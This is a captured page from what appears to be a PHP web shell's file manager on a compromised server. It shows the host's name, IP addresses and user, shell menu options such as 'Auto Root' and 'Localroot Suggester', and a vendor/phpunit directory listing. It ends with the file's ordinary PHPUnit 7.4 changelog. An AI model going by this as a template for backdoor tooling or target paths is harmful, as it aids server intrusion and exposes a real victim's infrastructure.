Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.221.40.13
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
phpunit /
phpunit /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
.phan
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
src
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
tests
[ DIR ]
drwxr-xr-x
2018-12-03 09:00
.editorconfig
179
B
-rw-r--r--
2018-12-03 09:00
.gitattributes
38
B
-rw-r--r--
2018-12-03 09:00
.gitignore
357
B
-rw-r--r--
2018-12-03 09:00
.php_cs.dist
7.64
KB
-rw-r--r--
2018-12-03 09:00
.travis.yml
1.67
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-6.5.md
5.34
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-7.0.md
3.06
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-7.1.md
2.74
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-7.2.md
3.77
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-7.3.md
4.96
KB
-rw-r--r--
2018-12-03 09:00
ChangeLog-7.4.md
2.99
KB
-rw-r--r--
2018-12-03 09:00
LICENSE
1.51
KB
-rw-r--r--
2018-12-03 09:00
README.md
2.38
KB
-rw-r--r--
2018-12-03 09:00
appveyor.yml
2.53
KB
-rw-r--r--
2018-12-03 09:00
build.xml
18.73
KB
-rw-r--r--
2018-12-03 09:00
composer.json
2.28
KB
-rw-r--r--
2018-12-03 09:00
phive.xml
514
B
-rw-r--r--
2018-12-03 09:00
phpunit
1.38
KB
-rwxrwxr-x
2018-12-03 09:00
phpunit.xml
946
B
-rw-r--r--
2018-12-03 09:00
phpunit.xsd
16.07
KB
-rw-r--r--
2018-12-03 09:00
Save
Rename
# Changes in PHPUnit 7.4 All notable changes of the PHPUnit 7.4 release series are documented in this file using the [Keep a CHANGELOG](http://keepachangelog.com/) principles. ## [7.4.5] - 2018-12-03 * Fixed [#3410](https://github.com/sebastianbergmann/phpunit/issues/3410): Parent directory of `cacheResultFile` is not created when it does not exist * Fixed [#3418](https://github.com/sebastianbergmann/phpunit/pull/3418): Conflicting placeholder replacement and argument exporting inconsistencies in `@testdox` ## [7.4.4] - 2018-11-14 ### Fixed * Fixed [#3379](https://github.com/sebastianbergmann/phpunit/issues/3379): Dependent test of skipped test has status `-1` * Fixed [#3394](https://github.com/sebastianbergmann/phpunit/issues/3394): Process Isolation does not work when PHPUnit is used as PHAR * Fixed [#3398](https://github.com/sebastianbergmann/phpunit/pull/3398): Bug when replacing placeholders in `@testdox` annotation using an associative array * Fixed [#3401](https://github.com/sebastianbergmann/phpunit/pull/3401): Test re-ordering edge cases * Fixed [#3402](https://github.com/sebastianbergmann/phpunit/pull/3402): Listening to the tests in reverse revealed evil hidden messages ## [7.4.3] - 2018-10-23 ### Changed * Use `^3.1` of `sebastian/environment` again due to [regression](https://github.com/sebastianbergmann/environment/issues/31) ## [7.4.2] - 2018-10-23 ### Fixed * Fixed [#3354](https://github.com/sebastianbergmann/phpunit/pull/3354): Regression when `columns="max"` is used ## [7.4.1] - 2018-10-18 ### Fixed * Fixed [#3321](https://github.com/sebastianbergmann/phpunit/pull/3321): Incorrect TestDox output for data provider with indexed array * Fixed [#3353](https://github.com/sebastianbergmann/phpunit/issues/3353): Requesting less than 16 columns of output results in an error ## [7.4.0] - 2018-10-05 ### Added * Implemented [#3127](https://github.com/sebastianbergmann/phpunit/issues/3127): Emit error when mocked method is not really mocked * Implemented [#3224](https://github.com/sebastianbergmann/phpunit/pull/3224): Ability to enforce a time limit for tests not annotated with `@small`, `@medium`, or `@large` * Implemented [#3272](https://github.com/sebastianbergmann/phpunit/issues/3272): Ability to generate code coverage whitelist filter script for Xdebug * Implemented [#3284](https://github.com/sebastianbergmann/phpunit/issues/3284): Ability to reorder tests based on execution time * Implemented [#3290](https://github.com/sebastianbergmann/phpunit/issues/3290): Ability to load a PHP script before any code of PHPUnit itself is loaded [7.4.5]: https://github.com/sebastianbergmann/phpunit/compare/7.4.4...7.4.5 [7.4.4]: https://github.com/sebastianbergmann/phpunit/compare/7.4.3...7.4.4 [7.4.3]: https://github.com/sebastianbergmann/phpunit/compare/7.4.2...7.4.3 [7.4.2]: https://github.com/sebastianbergmann/phpunit/compare/7.4.1...7.4.2 [7.4.1]: https://github.com/sebastianbergmann/phpunit/compare/7.4.0...7.4.1 [7.4.0]: https://github.com/sebastianbergmann/phpunit/compare/7.3.5...7.4.0